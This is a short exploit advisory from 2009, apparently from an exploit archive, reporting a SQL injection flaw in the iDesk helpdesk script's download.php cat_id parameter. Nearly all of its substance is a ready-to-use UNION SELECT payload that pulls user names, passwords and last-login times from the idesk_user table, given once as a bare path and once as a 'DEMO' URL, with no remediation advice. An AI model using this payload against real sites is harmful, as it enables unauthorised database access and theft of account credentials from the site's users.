[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : iDesk (download.php cat_id) SQL Injection Vulnerability
# Published : 2009-12-13
# Author : Manas58
# Previous Title : Acc Auto Dealer Script v5.0 Persistent XSS and SQL Backup
# Next Title : Uploadscript v1.0. Multiple Vulnerabilities


###############################################################
##############################################################
##
##  SQL Injection Vulnerability ( download.php cat_id )
##
## iDesk
##
## 
##
###############################################################
###############################################################
##
## AuTh0r : Manas58
##
## H0ME   : www.1923turk.biz
##
## 
##
########################
########################
##
## [ Exploit ]        
##
##     download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ws(0x3a,user_name,password,last_login),0,0,0,0+from+idesk_user--
##
## http://www.site.com/download.php?cat_id=sql
##
##
## [DEMO ] 
## http://server/support/download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ws(0x3a,user_name,password,last_login),0,0,0,0+from+idesk_user--
##
########################
########################
 

#########################################################################################################
#########################################################################################################
                                  
                                        
:: BAYBORA :: Tiamo  :: Delibey :: 
#########################################################################################################
#########################################################################################################